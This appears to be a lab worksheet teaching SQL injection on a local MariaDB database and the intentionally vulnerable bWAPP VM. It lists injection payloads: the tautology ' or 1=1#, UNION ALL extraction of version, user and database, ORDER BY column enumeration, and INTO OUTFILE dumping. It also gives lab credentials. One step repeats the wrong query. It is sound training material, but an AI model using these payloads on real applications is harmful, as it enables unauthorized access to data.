Task 1: SQL Injection Logic

Step 1

• Make sure Kali is running.

Step 2

• Connect to the MariaDB service and use the database called cyber.

service mysql start
mysql -u root -p
toor
use cyber ;

Step 3

• Show only the row with an ID value of 1.

select * from attackers where id=1 ;

Step 4

• Try to display a non-existing value using the where statement.
• If it does not exist, the output will be an empty set (0.000 sec).

select * from attackers where id=1 ;

Step 5

• Enumerate the attackers table using a non-existing ID in a where statement and bypass it using OR.

select * from attackers where id=-1 or 1=1 ;

Step 6

• • Use ORDER BY to enumerate the number of columns. ORDER BY filters the output of the query, which enables a hacker to deduce the column number via trial and error.

select * from attackers order by 1,2,3,4,5 ;

Step 7

• Use UNION ALL to get the version, user, and database name, where the functions end with (). UNION ALL or UNION * allows a hacker to add tables with matching column counts to the query's output. With this method, a hacker can add individual values to each column, which can then be the function's output.

select * from attackers where id union all select version(),user(),database(),4,5 ;

Step 8

• Output the data of the attackers table to a file.
• into outfile saves the output to a file.

select * from attackers into outfile '/tmp/database.txt' ;
Ctrl + x
cat /tmp/database.txt

Task 2: SQL Injection Practice

Step 1

• Turn on the bWAPP VM.

Step 2

• Enter bee-box and choose the SQL Injection (GET/Search) challenge.

Step 3

• Create an error in the search query (expect an SQL error to appear instead of the standard search output). Use the symbol ‘ to create an error.

Step 4

• Try to get all available results with a true statement by using the input ‘ or 1=1#.